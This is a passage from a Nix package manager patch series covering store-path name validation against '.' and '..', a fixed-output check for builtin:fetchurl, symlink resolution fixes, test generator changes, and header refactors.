more consistently in errors [#561](https://github.com/NixOS/nix/issues/561) [#9555](https://github.com/NixOS/nix/pull/9555) @@ -281,45 +151,11 @@ can be set with [the `max-call-depth` option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). - This fixes segfaults or the following unhelpful error message in many cases: - - error: stack overflow (possible infinite recursion) - - Before: - - ``` - $ nix-instantiate --eval --expr '(x: x x) (x: x x)' - Segmentation fault: 11 - ``` - - After: - - ``` - $ nix-instantiate --eval --expr '(x: x x) (x: x x)' - error: stack overflow - - at «string»:1:14: - 1| (x: x x) (x: x x) - | ^ - ``` + This replaces the `stack overflow (possible infinite recursion)` message. - Better error reporting for `with` expressions [#9658](https://github.com/NixOS/nix/pull/9658) - `with` expressions using non-attrset values to resolve variables are now reported with proper positions. - - Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: - - ``` - nix-repl> with 1; a - error: - … - - at «none»:0: (source not available) - - error: value is an integer while a set was expected - ``` - - Now position information is preserved and reported as with most other errors: + `with` expressions using non-attrset values to resolve variables are now reported with proper positions, e.g. ``` nix-repl> with 1; a @@ -331,4 +167,3 @@ error: expected a set but found an integer ``` - From 2f3fb6c12e91907b91be88e69a5a430ee3d86642 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 22:57:25 +0100 Subject: [PATCH 364/654] Bump version --- .version | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.version b/.version index 7329e21c3..db65e2167 100644 --- a/.version +++ b/.version @@ -1 +1 @@ -2.20.0 +2.21.0 From a3aae7beefb675ea8c27f07284995d4f06f9952c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 29 Jan 2024 22:14:10 +0000 Subject: [PATCH 365/654] build(deps): bump zeebe-io/backport-action from 2.4.0 to 2.4.1 Bumps [zeebe-io/backport-action](https://github.com/zeebe-io/backport-action) from 2.4.0 to 2.4.1. - [Release notes](https://github.com/zeebe-io/backport-action/releases) - [Commits](https://github.com/zeebe-io/backport-action/compare/v2.4.0...v2.4.1) --- updated-dependencies: - dependency-name: zeebe-io/backport-action dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- .github/workflows/backport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/backport.yml b/.github/workflows/backport.yml index 46a4529c1..5b75704b5 100644 --- a/.github/workflows/backport.yml +++ b/.github/workflows/backport.yml @@ -21,7 +21,7 @@ jobs: fetch-depth: 0 - name: Create backport PRs # should be kept in sync with `version` - uses: zeebe-io/backport-action@v2.4.0 + uses: zeebe-io/backport-action@v2.4.1 with: # Config README: https://github.com/zeebe-io/backport-action#backport-action github_token: ${{ secrets.GITHUB_TOKEN }} From b36ff47e7c38de2eebe4934c27f5594babcebe1b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 30 Jan 2024 15:00:18 +0100 Subject: [PATCH 366/654] Resolve symlinks in a few more places Fixes #9882. --- src/libexpr/eval.cc | 2 +- src/libexpr/primops.cc | 2 +- tests/functional/nix-channel.sh | 5 ++++- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index b60cdcf55..91fd3ddf8 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2338,7 +2338,7 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat auto dstPath = i != srcToStore.end() ? i->second : [&]() { - auto dstPath = fetchToStore(*store, path, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); + auto dstPath = fetchToStore(*store, path.resolveSymlinks(), path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); allowPath(dstPath); srcToStore.insert_or_assign(path, dstPath); printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath)); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 993ecceb2..cdd9a3a09 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -2241,7 +2241,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = fetchToStore(*state.store, path, name, method, filter.get(), state.repair); + auto dstPath = fetchToStore(*state.store, path.resolveSymlinks(), name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); diff --git a/tests/functional/nix-channel.sh b/tests/functional/nix-channel.sh index b5d935004..ca5df3bdd 100644 --- a/tests/functional/nix-channel.sh +++ b/tests/functional/nix-channel.sh @@ -29,7 +29,8 @@ unset NIX_CONFIG # Create a channel. rm -rf $TEST_ROOT/foo mkdir -p $TEST_ROOT/foo -nix copy --to file://$TEST_ROOT/foo?compression="bzip2" $(nix-store -r $(nix-instantiate dependencies.nix)) +drvPath=$(nix-instantiate dependencies.nix) +nix copy --to file://$TEST_ROOT/foo?compression="bzip2" $(nix-store -r "$drvPath") rm -rf $TEST_ROOT/nixexprs mkdir -p $TEST_ROOT/nixexprs cp config.nix dependencies.nix dependencies.builder*.sh $TEST_ROOT/nixexprs/ @@ -64,3 +65,5 @@ grepQuiet 'item.*attrPath="foo".*name="dependencies-top"' $TEST_ROOT/meta.xml nix-env -i dependencies-top [ -e $TEST_HOME/.nix-profile/foobar ] +# Test evaluation through a channel symlink (#9882). +nix-instantiate '' From caea7dcb7e8fe75ef94635e15f49283668e60965 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 31 Jan 2024 11:43:27 -0500 Subject: [PATCH 367/654] Change an `allowPath` call to take a store path again This looks like a revert of #5844, but is not. That one was needed because https://github.com/NixOS/nix/commit/d90f9d4b9994dc1f15b9d664ae313f06261d6058#diff-0f59bb6f197822ef9f19ceae9624989499d170c84dfdc1f486a8959bb4588cafR85 changed the type of the argument to `allowPath` from a `StorePath` to a `Path`. But since https://github.com/NixOS/nix/commit/caabc4f64889d5a4c47d6102b3aa1d3c80bbc107#diff-0f59bb6f197822ef9f19ceae9624989499d170c84dfdc1f486a8959bb4588cafL100-R92, it is a `StorePath` again. I think this is worth changing because we want to be very careful about `toRealPath` and the evaluator --- ideally the choice of real path does not affect evaluation at all. So using it fewer times is better. --- src/libexpr/primops.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index cdd9a3a09..1197b6e13 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -112,7 +112,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context) for (auto & outputPath : outputsToCopyAndAllow) { /* Add the output of this derivations to the allowed paths. */ - allowPath(store->toRealPath(outputPath)); + allowPath(outputPath); } return res; From b13e6a76b4f289c6db69ffaa7bd35b7e44f2a391 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 27 Jan 2024 11:19:05 +0100 Subject: [PATCH 368/654] parseStorePath: Support leading period --- doc/manual/rl-next/leading-period.md | 10 ++++++++++ tests/unit/libstore/path.cc | 1 + 2 files changed, 11 insertions(+) create mode 100644 doc/manual/rl-next/leading-period.md diff --git a/doc/manual/rl-next/leading-period.md b/doc/manual/rl-next/leading-period.md new file mode 100644 index 000000000..e9a32a74a --- /dev/null +++ b/doc/manual/rl-next/leading-period.md @@ -0,0 +1,10 @@ +--- +synopsis: Store paths are allowed to start with `.` +issues: 912 +prs: 9867 9091 9095 9120 9121 9122 9130 9219 9224 +--- + +Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties. +From now on, leading periods are officially, definitively supported. + +Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286). diff --git a/tests/unit/libstore/path.cc b/tests/unit/libstore/path.cc index 5485ab8bb..f7b69d5f9 100644 --- a/tests/unit/libstore/path.cc +++ b/tests/unit/libstore/path.cc @@ -62,6 +62,7 @@ TEST_DO_PARSE(underscore, "foo_bar") TEST_DO_PARSE(period, "foo.txt") TEST_DO_PARSE(question_mark, "foo?why") TEST_DO_PARSE(equals_sign, "foo=foo") +TEST_DO_PARSE(dotfile, ".gitignore") #undef TEST_DO_PARSE From 69bbd5852af9b2f0b794162bd1debcdf64fc6648 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 30 Jan 2024 18:18:27 +0100 Subject: [PATCH 369/654] test: Generate distinct path names Gen::just is the constant generator. Don't just return that! --- tests/unit/libstore-support/tests/path.cc | 72 ++++++++++++----------- 1 file changed, 37 insertions(+), 35 deletions(-) diff --git a/tests/unit/libstore-support/tests/path.cc b/tests/unit/libstore-support/tests/path.cc index bbe43bad4..8ddda8027 100644 --- a/tests/unit/libstore-support/tests/path.cc +++ b/tests/unit/libstore-support/tests/path.cc @@ -1,3 +1,4 @@ +#include #include #include @@ -20,59 +21,60 @@ void showValue(const StorePath & p, std::ostream & os) namespace rc { using namespace nix; -Gen Arbitrary::arbitrary() +Gen storePathChar() { - auto len = *gen::inRange( - 1, - StorePath::MaxPathLen - StorePath::HashLen); - - std::string pre; - pre.reserve(len); - - for (size_t c = 0; c < len; ++c) { - switch (auto i = *gen::inRange(0, 10 + 2 * 26 + 6)) { + return rc::gen::apply([](uint8_t i) -> char { + switch (i) { case 0 ... 9: - pre += '0' + i; + return '0' + i; case 10 ... 35: - pre += 'A' + (i - 10); - break; + return 'A' + (i - 10); case 36 ... 61: - pre += 'a' + (i - 36); - break; + return 'a' + (i - 36); case 62: - pre += '+'; - break; + return '+'; case 63: - pre += '-'; - break; + return '-'; case 64: - pre += '.'; - break; + return '.'; case 65: - pre += '_'; - break; + return '_'; case 66: - pre += '?'; - break; + return '?'; case 67: - pre += '='; - break; + return '='; default: assert(false); } - } + }, + gen::inRange(0, 10 + 2 * 26 + 6)); +} - return gen::just(StorePathName { - .name = std::move(pre), - }); +Gen Arbitrary::arbitrary() +{ + return gen::construct( + gen::suchThat( + gen::container(storePathChar()), + [](const std::string & s) { + return + !( s == "" + || s == "." + || s == ".." + || s.starts_with(".-") + || s.starts_with("..-") + ); + } + ) + ); } Gen Arbitrary::arbitrary() { - return gen::just(StorePath { - *gen::arbitrary(), - (*gen::arbitrary()).name, - }); + return + gen::construct( + gen::arbitrary(), + gen::apply([](StorePathName n){ return n.name; }, gen::arbitrary()) + ); } } // namespace rc From 8406da28773f050e00a006e4812e3ecbf919a2a9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 30 Jan 2024 18:31:28 +0100 Subject: [PATCH 370/654] test: Generate distinct hashes Gen::just is the constant generator. Don't just return that! --- tests/unit/libutil-support/tests/hash.cc | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/tests/unit/libutil-support/tests/hash.cc b/tests/unit/libutil-support/tests/hash.cc index 50889cd33..51b9663b4 100644 --- a/tests/unit/libutil-support/tests/hash.cc +++ b/tests/unit/libutil-support/tests/hash.cc @@ -11,10 +11,17 @@ using namespace nix; Gen Arbitrary::arbitrary() { - Hash hash(HashAlgorithm::SHA1); - for (size_t i = 0; i < hash.hashSize; ++i) - hash.hash[i] = *gen::arbitrary(); - return gen::just(hash); + Hash prototype(HashAlgorithm::SHA1); + return + gen::apply( + [](const std::vector & v) { + Hash hash(HashAlgorithm::SHA1); + assert(v.size() == hash.hashSize); + std::copy(v.begin(), v.end(), hash.hash); + return hash; + }, + gen::container>(prototype.hashSize, gen::arbitrary()) + ); } } From f1b4663805a9dbcb1ace64ec110092d17c9155e0 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 30 Jan 2024 18:37:23 +0100 Subject: [PATCH 371/654] Disallow store path names that are . or .. (plus opt. -) As discussed in the maintainer meeting on 2024-01-29. Mainly this is to avoid a situation where the name is parsed and treated as a file name, mostly to protect users. .-* and ..-* are also considered invalid because they might strip on that separator to remove versions. Doesn't really work, but that's what we decided, and I won't argue with it, because .-* probably doesn't seem to have a real world application anyway. We do still permit a 1-character name that's just "-", which still poses a similar risk in such a situation. We can't start disallowing trailing -, because a non-zero number of users will need it and we've seen how annoying and painful such a change is. What matters most is preventing a situation where . or .. can be injected, and to just get this done. --- doc/manual/rl-next/leading-period.md | 2 +- src/libstore/path-regex.hh | 7 ++- src/libstore/path.cc | 13 ++++++ tests/unit/libstore/path.cc | 68 ++++++++++++++++++++++++++++ 4 files changed, 88 insertions(+), 2 deletions(-) diff --git a/doc/manual/rl-next/leading-period.md b/doc/manual/rl-next/leading-period.md index e9a32a74a..ef7c2326f 100644 --- a/doc/manual/rl-next/leading-period.md +++ b/doc/manual/rl-next/leading-period.md @@ -5,6 +5,6 @@ prs: 9867 9091 9095 9120 9121 9122 9130 9219 9224 --- Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties. -From now on, leading periods are officially, definitively supported. +From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`. Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286). diff --git a/src/libstore/path-regex.hh b/src/libstore/path-regex.hh index 4f8dc4c1f..56c2cfc1d 100644 --- a/src/libstore/path-regex.hh +++ b/src/libstore/path-regex.hh @@ -3,6 +3,11 @@ namespace nix { -static constexpr std::string_view nameRegexStr = R"([0-9a-zA-Z\+\-\._\?=]+)"; + +static constexpr std::string_view nameRegexStr = + // This uses a negative lookahead: (?!\.\.?(-|$)) + // - deny ".", "..", or those strings followed by '-' + // - when it's not those, start again at the start of the input and apply the next regex, which is [0-9a-zA-Z\+\-\._\?=]+ + R"((?!\.\.?(-|$))[0-9a-zA-Z\+\-\._\?=]+)"; } diff --git a/src/libstore/path.cc b/src/libstore/path.cc index 4361b3194..5db4b974c 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -10,6 +10,19 @@ static void checkName(std::string_view path, std::string_view name) throw BadStorePath("store path '%s' has a name longer than %d characters", path, StorePath::MaxPathLen); // See nameRegexStr for the definition + if (name[0] == '.') { + // check against "." and "..", followed by end or dash + if (name.size() == 1) + throw BadStorePath("store path '%s' has invalid name '%s'", path, name); + if (name[1] == '-') + throw BadStorePath("store path '%s' has invalid name '%s': first dash-separated component must not be '%s'", path, name, "."); + if (name[1] == '.') { + if (name.size() == 2) + throw BadStorePath("store path '%s' has invalid name '%s'", path, name); + if (name[2] == '-') + throw BadStorePath("store path '%s' has invalid name '%s': first dash-separated component must not be '%s'", path, name, ".."); + } + } for (auto c : name) if (!((c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') diff --git a/tests/unit/libstore/path.cc b/tests/unit/libstore/path.cc index f7b69d5f9..213b6e95f 100644 --- a/tests/unit/libstore/path.cc +++ b/tests/unit/libstore/path.cc @@ -39,6 +39,12 @@ TEST_DONT_PARSE(double_star, "**") TEST_DONT_PARSE(star_first, "*,foo") TEST_DONT_PARSE(star_second, "foo,*") TEST_DONT_PARSE(bang, "foo!o") +TEST_DONT_PARSE(dot, ".") +TEST_DONT_PARSE(dot_dot, "..") +TEST_DONT_PARSE(dot_dot_dash, "..-1") +TEST_DONT_PARSE(dot_dash, ".-1") +TEST_DONT_PARSE(dot_dot_dash_a, "..-a") +TEST_DONT_PARSE(dot_dash_a, ".-a") #undef TEST_DONT_PARSE @@ -63,6 +69,10 @@ TEST_DO_PARSE(period, "foo.txt") TEST_DO_PARSE(question_mark, "foo?why") TEST_DO_PARSE(equals_sign, "foo=foo") TEST_DO_PARSE(dotfile, ".gitignore") +TEST_DO_PARSE(triple_dot_a, "...a") +TEST_DO_PARSE(triple_dot_1, "...1") +TEST_DO_PARSE(triple_dot_dash, "...-") +TEST_DO_PARSE(triple_dot, "...") #undef TEST_DO_PARSE @@ -84,6 +94,64 @@ RC_GTEST_FIXTURE_PROP( RC_ASSERT(p == store->parseStorePath(store->printStorePath(p))); } + +RC_GTEST_FIXTURE_PROP( + StorePathTest, + prop_check_regex_eq_parse, + ()) +{ + static auto nameFuzzer = + rc::gen::container( + rc::gen::oneOf( + // alphanum, repeated to weigh heavier + rc::gen::oneOf( + rc::gen::inRange('0', '9'), + rc::gen::inRange('a', 'z'), + rc::gen::inRange('A', 'Z') + ), + // valid symbols + rc::gen::oneOf( + rc::gen::just('+'), + rc::gen::just('-'), + rc::gen::just('.'), + rc::gen::just('_'), + rc::gen::just('?'), + rc::gen::just('=') + ), + // symbols for scary .- and ..- cases, repeated for weight + rc::gen::just('.'), rc::gen::just('.'), + rc::gen::just('.'), rc::gen::just('.'), + rc::gen::just('-'), rc::gen::just('-'), + // ascii symbol ranges + rc::gen::oneOf( + rc::gen::inRange(' ', '/'), + rc::gen::inRange(':', '@'), + rc::gen::inRange('[', '`'), + rc::gen::inRange('{', '~') + ), + // typical whitespace + rc::gen::oneOf( + rc::gen::just(' '), + rc::gen::just('\t'), + rc::gen::just('\n'), + rc::gen::just('\r') + ), + // some chance of control codes, non-ascii or other garbage we missed + rc::gen::inRange('\0', '\xff') + )); + + auto name = *nameFuzzer; + + std::string path = store->storeDir + "/575s52sh487i0ylmbs9pvi606ljdszr0-" + name; + bool parsed = false; + try { + store->parseStorePath(path); + parsed = true; + } catch (const BadStorePath &) { + } + RC_ASSERT(parsed == std::regex_match(std::string { name }, nameRegex)); +} + #endif } From 0f2e9e6bd2b62b15babe608fbd18eccfc0215d06 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 1 Feb 2024 01:01:04 +0100 Subject: [PATCH 372/654] Typo --- src/libstore/build/worker.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/worker.hh b/src/libstore/build/worker.hh index 23ad87914..ced013ddd 100644 --- a/src/libstore/build/worker.hh +++ b/src/libstore/build/worker.hh @@ -116,7 +116,7 @@ private: WeakGoals waitingForAWhile; /** - * Last time the goals in `waitingForAWhile` where woken up. + * Last time the goals in `waitingForAWhile` were woken up. */ steady_time_point lastWokenUp; From 58c26dd0f0090bfd1460f138f9ba17eda8a8ab5b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 1 Feb 2024 01:01:39 +0100 Subject: [PATCH 373/654] Add .clang-tidy --- .clang-tidy | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 .clang-tidy diff --git a/.clang-tidy b/.clang-tidy new file mode 100644 index 000000000..0887b8670 --- /dev/null +++ b/.clang-tidy @@ -0,0 +1,3 @@ +# We use pointers to aggregates in a couple of places, intentionally. +# void * would look weird. +Checks: '-bugprone-sizeof-expression' From 1ee42c5b88eb0533ebcf8b2579ec82f2be80e4b2 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 1 Feb 2024 21:46:01 +0100 Subject: [PATCH 374/654] builtin:fetchurl: Ensure a fixed-output derivation Previously we didn't check that the derivation was fixed-output, so you could use builtin:fetchurl to impurely fetch a file. --- src/libstore/builtins/fetchurl.cc | 3 +++ tests/functional/fetchurl.sh | 3 +++ 2 files changed, 6 insertions(+) diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index 2086bd0b9..cf7b2770f 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -16,6 +16,9 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) writeFile(settings.netrcFile, netrcData, 0600); } + if (!drv.type().isFixed()) + throw Error("'builtin:fetchurl' must be a fixed-output derivation"); + auto getAttr = [&](const std::string & name) { auto i = drv.env.find(name); if (i == drv.env.end()) throw Error("attribute '%s' missing", name); diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh index 8cd40c09f..578f5a34c 100644 --- a/tests/functional/fetchurl.sh +++ b/tests/functional/fetchurl.sh @@ -78,3 +78,6 @@ outPath=$(nix-build -vvvvv --expr 'import ' --argstr url file: test -x $outPath/fetchurl.sh test -L $outPath/symlink + +# Make sure that *not* passing a outputHash fails. +expectStderr 100 nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' From b8b739e484078863c10c48d031fa8459081ba8b3 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 1 Feb 2024 22:01:02 +0100 Subject: [PATCH 375/654] builtin:fetchurl: Get output hash info from the drv --- src/libstore/builtins/fetchurl.cc | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index cf7b2770f..a9f2e748e 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -16,7 +16,12 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) writeFile(settings.netrcFile, netrcData, 0600); } - if (!drv.type().isFixed()) + auto out = get(drv.outputs, "out"); + if (!out) + throw Error("'builtin:fetchurl' requires an 'out' output"); + + auto dof = std::get_if(&out->raw); + if (!dof) throw Error("'builtin:fetchurl' must be a fixed-output derivation"); auto getAttr = [&](const std::string & name) { @@ -62,13 +67,11 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) }; /* Try the hashed mirrors first. */ - if (getAttr("outputHashMode") == "flat") + if (dof->ca.method.getFileIngestionMethod() == FileIngestionMethod::Flat) for (auto hashedMirror : settings.hashedMirrors.get()) try { if (!hasSuffix(hashedMirror, "/")) hashedMirror += '/'; - std::optional ht = parseHashAlgoOpt(getAttr("outputHashAlgo")); - Hash h = newHashAllowEmpty(getAttr("outputHash"), ht); - fetch(hashedMirror + printHashAlgo(h.algo) + "/" + h.to_string(HashFormat::Base16, false)); + fetch(hashedMirror + printHashAlgo(dof->ca.hash.algo) + "/" + dof->ca.hash.to_string(HashFormat::Base16, false)); return; } catch (Error & e) { debug(e.what()); From c62c21e29af20f1c14a59ab37d7a25dd0b70f69e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 1 Feb 2024 13:07:45 -0800 Subject: [PATCH 376/654] Move `PodIdx` to `pos-idx.hh` and `PosTable` to `pos-table.hh` --- src/libexpr/nixexpr.hh | 86 +--------------------------------------- src/libexpr/pos-idx.hh | 48 ++++++++++++++++++++++ src/libexpr/pos-table.hh | 83 ++++++++++++++++++++++++++++++++++++++ 3 files changed, 133 insertions(+), 84 deletions(-) create mode 100644 src/libexpr/pos-idx.hh create mode 100644 src/libexpr/pos-table.hh diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index b6189c2a9..da0ec6e9d 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -9,6 +9,8 @@ #include "error.hh" #include "chunked-vector.hh" #include "position.hh" +#include "pos-idx.hh" +#include "pos-table.hh" namespace nix { @@ -29,90 +31,6 @@ public: using EvalError::EvalError; }; -class PosIdx { - friend class PosTable; - -private: - uint32_t id; - - explicit PosIdx(uint32_t id): id(id) {} - -public: - PosIdx() : id(0) {} - - explicit operator bool() const { return id > 0; } - - bool operator <(const PosIdx other) const { return id < other.id; } - - bool operator ==(const PosIdx other) const { return id == other.id; } - - bool operator !=(const PosIdx other) const { return id != other.id; } -}; - -class PosTable -{ -public: - class Origin { - friend PosTable; - private: - // must always be invalid by default, add() replaces this with the actual value. - // subsequent add() calls use this index as a token to quickly check whether the - // current origins.back() can be reused or not. - mutable uint32_t idx = std::numeric_limits::max(); - - // Used for searching in PosTable::[]. - explicit Origin(uint32_t idx): idx(idx), origin{std::monostate()} {} - - public: - const Pos::Origin origin; - - Origin(Pos::Origin origin): origin(origin) {} - }; - - struct Offset { - uint32_t line, column; - }; - -private: - std::vector origins; - ChunkedVector offsets; - -public: - PosTable(): offsets(1024) - { - origins.reserve(1024); - } - - PosIdx add(const Origin & origin, uint32_t line, uint32_t column) - { - const auto idx = offsets.add({line, column}).second; - if (origins.empty() || origins.back().idx != origin.idx) { - origin.idx = idx; - origins.push_back(origin); - } - return PosIdx(idx + 1); - } - - Pos operator[](PosIdx p) const - { - if (p.id == 0 || p.id > offsets.size()) - return {}; - const auto idx = p.id - 1; - /* we want the last key <= idx, so we'll take prev(first key > idx). - this is guaranteed to never rewind origin.begin because the first - key is always 0. */ - const auto pastOrigin = std::upper_bound( - origins.begin(), origins.end(), Origin(idx), - [] (const auto & a, const auto & b) { return a.idx < b.idx; }); - const auto origin = *std::prev(pastOrigin); - const auto offset = offsets[idx]; - return {offset.line, offset.column, origin.origin}; - } -}; - -inline PosIdx noPos = {}; - - struct Env; struct Value; class EvalState; diff --git a/src/libexpr/pos-idx.hh b/src/libexpr/pos-idx.hh new file mode 100644 index 000000000..9949f1dc5 --- /dev/null +++ b/src/libexpr/pos-idx.hh @@ -0,0 +1,48 @@ +#pragma once + +#include + +namespace nix { + +class PosIdx +{ + friend class PosTable; + +private: + uint32_t id; + + explicit PosIdx(uint32_t id) + : id(id) + { + } + +public: + PosIdx() + : id(0) + { + } + + explicit operator bool() const + { + return id > 0; + } + + bool operator<(const PosIdx other) const + { + return id < other.id; + } + + bool operator==(const PosIdx other) const + { + return id == other.id; + } + + bool operator!=(const PosIdx other) const + { + return id != other.id; + } +}; + +inline PosIdx noPos = {}; + +} diff --git a/src/libexpr/pos-table.hh b/src/libexpr/pos-table.hh new file mode 100644 index 000000000..1decf3c85 --- /dev/null +++ b/src/libexpr/pos-table.hh @@ -0,0 +1,83 @@ +#pragma once + +#include +#include +#include + +#include "chunked-vector.hh" +#include "pos-idx.hh" +#include "position.hh" + +namespace nix { + +class PosTable +{ +public: + class Origin + { + friend PosTable; + private: + // must always be invalid by default, add() replaces this with the actual value. + // subsequent add() calls use this index as a token to quickly check whether the + // current origins.back() can be reused or not. + mutable uint32_t idx = std::numeric_limits::max(); + + // Used for searching in PosTable::[]. + explicit Origin(uint32_t idx) + : idx(idx) + , origin{std::monostate()} + { + } + + public: + const Pos::Origin origin; + + Origin(Pos::Origin origin) + : origin(origin) + { + } + }; + + struct Offset + { + uint32_t line, column; + }; + +private: + std::vector origins; + ChunkedVector offsets; + +public: + PosTable() + : offsets(1024) + { + origins.reserve(1024); + } + + PosIdx add(const Origin & origin, uint32_t line, uint32_t column) + { + const auto idx = offsets.add({line, column}).second; + if (origins.empty() || origins.back().idx != origin.idx) { + origin.idx = idx; + origins.push_back(origin); + } + return PosIdx(idx + 1); + } + + Pos operator[](PosIdx p) const + { + if (p.id == 0 || p.id > offsets.size()) + return {}; + const auto idx = p.id - 1; + /* we want the last key <= idx, so we'll take prev(first key > idx). + this is guaranteed to never rewind origin.begin because the first + key is always 0. */ + const auto pastOrigin = std::upper_bound( + origins.begin(), origins.end(), Origin(idx), [](const auto & a, const auto & b) { return a.idx < b.idx; }); + const auto origin = *std::prev(pastOrigin); + const auto offset = offsets[idx]; + return {offset.line, offset.column, origin.origin}; + } +}; + +} From c6a89c1a1659b31694c0fbcd21d78a6dd521c732 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 22 Jan 2024 17:08:29 -0800 Subject: [PATCH 377/654] libexpr: Support structured error classes While preparing PRs like #9753, I've had to change error messages in dozens of code paths. It would be nice if instead of EvalError("expected 'boolean' but found '%1%'", showType(v)) we could write TypeError(v, "boolean") or similar. Then, changing the error message could be a mechanical refactor with the compiler pointing out places the constructor needs to be changed, rather than the error-prone process of grepping through the codebase. Structured errors would also help prevent the "same" error from having multiple slightly different messages, and could be a first step towards error codes / an error index. This PR reworks the exception infrastructure in `libexpr` to support exception types with different constructor signatures than `BaseError`. Actually refactoring the exceptions to use structured data will come in a future PR (this one is big enough already, as it has to touch every exception in `libexpr`). The core design is in `eval-error.hh`. Generally, errors like this: state.error("'%s' is not a string", getAttrPathStr()) .debugThrow() are transformed like this: state.error("'%s' is not a string", getAttrPathStr()) .debugThrow() The type annotation has moved from `ErrorBuilder::debugThrow` to `EvalState::error`. --- src/libcmd/repl.cc | 2 - src/libexpr/attr-path.cc | 8 +- src/libexpr/eval-cache.cc | 30 +-- src/libexpr/eval-error.cc | 113 ++++++++ src/libexpr/eval-error.hh | 118 +++++++++ src/libexpr/eval-inline.hh | 19 +- src/libexpr/eval.cc | 217 +++++++--------- src/libexpr/eval.hh | 91 +------ src/libexpr/flake/flake.cc | 16 +- src/libexpr/get-drvs.cc | 5 +- src/libexpr/json-to-value.cc | 4 +- src/libexpr/json-to-value.hh | 7 +- src/libexpr/lexer.l | 12 +- src/libexpr/nixexpr.cc | 8 +- src/libexpr/nixexpr.hh | 17 +- src/libexpr/parser-state.hh | 8 +- src/libexpr/parser.y | 8 +- src/libexpr/primops.cc | 244 ++++++++---------- src/libexpr/primops/context.cc | 50 ++-- src/libexpr/primops/fetchClosure.cc | 22 +- src/libexpr/primops/fetchMercurial.cc | 10 +- src/libexpr/primops/fetchTree.cc | 68 ++--- src/libexpr/primops/fromTOML.cc | 5 +- src/libexpr/value-to-json.cc | 18 +- src/libexpr/value.hh | 2 +- src/libmain/shared.cc | 2 +- src/libstore/build/entry-points.cc | 4 +- src/libstore/daemon.cc | 2 +- src/libutil/error.cc | 6 +- src/libutil/error.hh | 27 +- src/libutil/logging.cc | 2 +- src/nix-store/nix-store.cc | 4 +- src/nix/eval.cc | 2 +- src/nix/flake.cc | 6 +- tests/functional/fetchGit.sh | 4 +- .../lang/eval-fail-attr-name-type.err.exp | 5 + .../eval-fail-fromTOML-timestamps.err.exp | 2 +- .../functional/lang/eval-fail-toJSON.err.exp | 5 + .../eval-fail-using-set-as-attr-name.err.exp | 5 